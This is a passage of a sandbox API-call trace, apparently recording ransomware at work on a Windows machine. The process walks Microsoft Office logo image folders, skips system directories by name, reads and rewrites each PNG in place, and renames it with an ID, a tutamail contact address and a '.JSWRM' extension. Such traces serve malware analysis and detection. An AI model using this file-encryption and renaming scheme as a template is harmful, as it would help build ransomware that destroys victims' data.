dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.123] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2883) returned 1 [0133.123] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.123] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb40, lpOverlapped=0x0) returned 1 [0133.124] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.124] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb40, lpOverlapped=0x0) returned 1 [0133.125] CloseHandle (hObject=0x238) returned 1 [0133.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.126] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.scale-180.png", cAlternateFileName="MSDBE4~1.PNG")) returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2=".") returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="..") returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="...") returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="windows") returned -1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="recovery") returned -1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="perflogs") returned -1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="system volume information") returned -1 [0133.126] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-180.png", lpString2="msocache") returned -1 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-180.png", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 31 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.127] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3456) returned 1 [0133.127] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.127] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd80, lpOverlapped=0x0) returned 1 [0133.129] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.129] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd80, lpOverlapped=0x0) returned 1 [0133.129] CloseHandle (hObject=0x238) returned 1 [0133.129] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.130] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a665235, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a665235, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79f, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsAccessLogoSmall.scale-80.png", cAlternateFileName="MSF5B2~1.PNG")) returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0133.130] lstrcmpiW (lpString1="MsAccessLogoSmall.scale-80.png", lpString2="msocache") returned -1 [0133.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x241308, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0133.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0133.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsAccessLogoSmall.scale-80.png", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsAccessLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 30 [0133.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.131] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.131] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1951) returned 1 [0133.131] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.131] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0133.133] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.133] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0133.133] CloseHandle (hObject=0x238) returned 1 [0133.133] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsAccessLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\msaccesslogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.134] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6b16ff, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x878, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-black_scale-100.png", cAlternateFileName="MSPUBL~4.PNG")) returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.134] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.134] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-100.png", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 38 [0133.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.135] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2168) returned 1 [0133.135] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.136] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x870, lpOverlapped=0x0) returned 1 [0133.137] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.137] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x870, lpOverlapped=0x0) returned 1 [0133.137] CloseHandle (hObject=0x238) returned 1 [0133.137] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.138] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xad5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-black_scale-140.png", cAlternateFileName="MSPUBL~3.PNG")) returned 1 [0133.138] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.139] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-140.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 38 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.139] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.140] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2773) returned 1 [0133.140] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.140] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xad0, lpOverlapped=0x0) returned 1 [0133.155] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.155] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xad0, lpOverlapped=0x0) returned 1 [0133.155] CloseHandle (hObject=0x238) returned 1 [0133.155] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.157] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a68b471, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a68b471, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a68b471, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd19, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogo.contrast-black_scale-180.png", cAlternateFileName="MSPUBL~2.PNG")) returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.157] lstrcmpiW (lpString1="MsPubLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogo.contrast-black_scale-180.png", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 38 [0133.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 